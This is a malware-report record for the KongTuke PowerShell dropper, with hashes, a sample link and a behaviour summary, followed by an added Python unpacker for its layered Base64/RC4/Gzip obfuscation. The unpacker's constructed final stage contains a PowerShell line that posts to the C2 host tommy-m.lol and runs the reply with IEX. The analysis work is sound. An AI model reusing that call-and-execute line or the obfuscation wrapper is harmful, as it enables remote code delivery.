{"id":"461b178002c7b29a53d9180efd455692","title":"KongTuke — KongTuke · dropper · PowerShell","md5":"461b178002c7b29a53d9180efd455692","sha256":"ddd7ff70971b9fe381d137218f80c998ca10100cd2a62d55daf962bf9f44c9f2","family":"KongTuke","apt":"Zirconium(APT31)","verdict":null,"sample_type":"dropper","lang":"PowerShell","file_format":"PowerShell","compiler":"PowerShell","published_at":"2026-07-03T16:00:00.000Z","summary":"KongTuke four-layer nested dropper written in PowerShell, attributed to APT31 / Zirconium, first detected 2026-07-04. Key characteristics: (1) four-layer chained deobfuscation Base64→RC4→Gzip→IEX, with an independent RC4 key per layer; (2) C2 communication via HTTPS POST to tommy-m.lol/t, with the ABCD111/BCDA222 prefixes distinguishing the VM-check beacon from the domain-reconnaissance beacon; (3) anti-analysis by enumerating 55+ analysis-tool processes, covering VMware/VirtualBox/QEMU/Sandboxie; (4) string concatenation to evade AMSI keyword scanning; (5) the final stage executes the C2 response via IEX with no integrity verification. Family attribution: KongTuke v3 (APT31); C2 over HTTPS.","url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692","json_url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692.json","html_url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692","hash_urls":{"md5":"https://zseceye.com/hash/461b178002c7b29a53d9180efd455692","sha256":"https://zseceye.com/hash/ddd7ff70971b9fe381d137218f80c998ca10100cd2a62d55daf962bf9f44c9f2"},"search_urls":{"md5":"https://zseceye.com/?q=461b178002c7b29a53d9180efd455692","sha256":"https://zseceye.com/?q=ddd7ff70971b9fe381d137218f80c998ca10100cd2a62d55daf962bf9f44c9f2"},"sample_download_url":"https://zseceye.com/report/461b178002c7b29a53d9180efd455692/sample","sample_filename":"ddd7ff70971b9fe3.zip","iocs":[],"ips":[]}
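The summary above describes a four-layer Base64→RC4→Gzip→IEX chain with an independent RC4 key per layer, an HTTPS POST beacon to tommy-m.lol/t carrying the ABCD111/BCDA222 prefixes, and a final stage that IEXes whatever the C2 returns. The Python below is an added example of a static unpacker for such a chain; it is written for this page and is not code from the report, the sample, or the zseceye site. It assumes a stub shape (RC4 key embedded as GetBytes('...'), ciphertext as FromBase64String('...')) that the report does not show, and it builds its own four-layer sample with made-up keys and a constructed final stage, so it runs offline; the real stubs, keys and final-stage code are not on the page.

```python
"""Added example (not from the report): static unpacker for a PowerShell
dropper that nests N layers of Base64 -> RC4 -> Gzip -> IEX, each layer
carrying its own RC4 key in its stub.

Assumptions (the report does not show the stubs):
  * each stub embeds its RC4 key as GetBytes('<key>') and its blob as
    FromBase64String('<b64>');
  * the final stage, the stub template and the keys below are constructed.
"""
import base64
import gzip
import re
from typing import List, Tuple

KEY_RE = re.compile(r"GetBytes\('([^']+)'\)")
BLOB_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:                             # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wrap_layer(inner_script: str, key: str) -> str:
    """Build one layer in the order the chain implies (Gzip -> RC4 -> Base64)
    inside a PowerShell-style stub that reverses it and hands the result to
    IEX. The stub template is this example's own, not the sample's."""
    blob = base64.b64encode(rc4(key.encode(), gzip.compress(inner_script.encode()))).decode()
    return (
        "$k=[Text.Encoding]::ASCII.GetBytes('%s');"
        "$b=[Convert]::FromBase64String('%s');"
        "IEX([Text.Encoding]::UTF8.GetString((Gunzip (RC4 $k $b))))" % (key, blob)
    )


def peel_layer(script: str) -> Tuple[str, str]:
    """Return (key, decoded_inner_script) for one stub. Raises ValueError
    when the text is not a stub, i.e. we have reached the final stage."""
    key = KEY_RE.search(script)
    blob = BLOB_RE.search(script)
    if not key or not blob:
        raise ValueError("not a Base64/RC4/Gzip stub")
    raw = base64.b64decode(blob.group(1))
    plain = gzip.decompress(rc4(key.group(1).encode(), raw))
    return key.group(1), plain.decode("utf-8")


def unpack(script: str, max_layers: int = 16) -> Tuple[List[str], str]:
    """Peel stubs until the text no longer looks like one. Returns the
    per-layer keys (outermost first) and the final-stage script."""
    keys: List[str] = []
    current = script
    for _ in range(max_layers):
        try:
            key, current = peel_layer(current)
        except ValueError:
            break
        keys.append(key)
    else:
        raise RuntimeError("layer limit hit; stub format may have changed")
    return keys, current


def extract_indicators(final_stage: str) -> dict:
    """Pull the triage facts the report calls out: HTTP(S) C2 URLs, the two
    beacon prefixes, and whether the C2 response is passed straight to IEX."""
    return {
        "urls": sorted(set(re.findall(r"https?://[\w./-]+", final_stage))),
        "prefixes": sorted(p for p in ("ABCD111", "BCDA222") if p in final_stage),
        "iex_of_response": bool(re.search(r"IEX\s*\(\s*\$r", final_stage, re.I)),
    }


# Constructed sample: a stand-in final stage using the report's C2 endpoint
# and beacon prefixes, wrapped in four layers with four independent keys.
FINAL_STAGE = (
    "$p = if (Test-VM) {'ABCD111'} else {'BCDA222'};"
    "$r = Invoke-RestMethod -Method Post -Uri 'https://tommy-m.lol/t' -Body $p;"
    "IEX($r)"
)
LAYER_KEYS = ["k1-outer", "k2", "k3", "k4-inner"]   # made up for this example


def build_sample() -> str:
    script = FINAL_STAGE
    for key in reversed(LAYER_KEYS):   # innermost key is applied first
        script = wrap_layer(script, key)
    return script


if __name__ == "__main__":
    layer_keys, final = unpack(build_sample())
    print("layers:", len(layer_keys), "keys:", layer_keys)
    print("final stage:", final)
    print("indicators:", extract_indicators(final))
```

Against a real sample the only parts that should need adapting are the two regexes in KEY_RE and BLOB_RE, since the dropper's stubs will carry the key and blob in whatever syntax its author chose; the peel loop, the RC4 routine and the indicator extraction stay the same. Stopping on the first text that does not match a stub, rather than on a fixed count of four, is deliberate: it surfaces a changed layer count in a new build instead of silently returning an intermediate stage.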